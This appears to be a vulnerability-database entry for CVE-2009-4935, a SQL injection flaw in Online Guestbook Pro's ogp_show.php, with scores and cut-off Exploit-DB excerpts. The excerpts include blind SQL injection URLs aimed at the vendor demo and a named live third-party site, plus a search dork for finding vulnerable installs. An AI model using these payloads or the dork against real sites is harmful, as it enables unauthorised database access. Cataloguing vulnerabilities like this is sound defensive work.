CVE-2009-4935
Published 2010-07-12
CVE-2009-4935: SQL injection vulnerability in ogp_show.php in Online Guestbook Pro allows remote attackers to execute arbitrary SQL commands via the display parameter.
Priority: P343 · high · CVSS 2.0: 7.5
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 0.92% (55.6th percentile)
No detection rules found.
Exploit-DB
Esoftpro Online Guestbook Pro - Multiple Vulnerabilities
exploitdb·2010-07-04
CVE-2010-4996 Esoftpro Online Guestbook Pro - Multiple Vulnerabilities
---
Exploit Title: Esoftpro Online Guestbook Pro Multiple Vulnerability
Vendor url:http://www.esoftpro.com/
Version:5.1
Author: L0rd CrusAd3r aka VSN [[email protected]]
Published: 2010-07-4
Greetz to:r0073r (inj3ct0r.com), Sid3^effects, MaYur, MA1201, Sonic Bluehat,
Sai, KD, M4n0j.
Special Greetz: Topsecure.net, inj3ct0r Team ,Andhrahackers.com
Shoutzz:- To all ICW members.
Description:
Online Guestbook Pro (formerly known as EGuest PRO) is an award-winning
comprehensive guestbook system based on the popular guestbook s
Exploit-DB
Esoftpro Online Guestbook Pro - 'display' Blind SQL Injection
exploitdb·2009-04-17
CVE-2010-4996 Esoftpro Online Guestbook Pro - 'display' Blind SQL Injection
---
Online Guestbook Pro (display) Blind SQL Injection Vulnerability
{____________________________________}
Author: Hussin X
Home : WwW.IQ-TY.CoM
email: darkangel_g85[at]Yahoo[DoT]com
{____________________________________}
script : http://www.esoftpro.com/web_scripts_online_guestbook_pro.php
DorK : Powered by Online Guestbook Pro
Demo :
http://www.esoftpro.com/demo/OGP/ogp_show.php?display=10 and substring(@@version,1,1)=5
http://www.esoftpro.com/demo/OGP/ogp_show.php?display=10 and substring(@@version,1,1)=4
BuT Results = Forbidden :D
demo to any web
http://www.musicandfriends.ca/guestbook/ogp_show.php?display=10 and substring(@@version,1,1)=5
http://www.musicandfriends.ca/guestbook/ogp_show.php?display=10 and
No writeups or analysis indexed.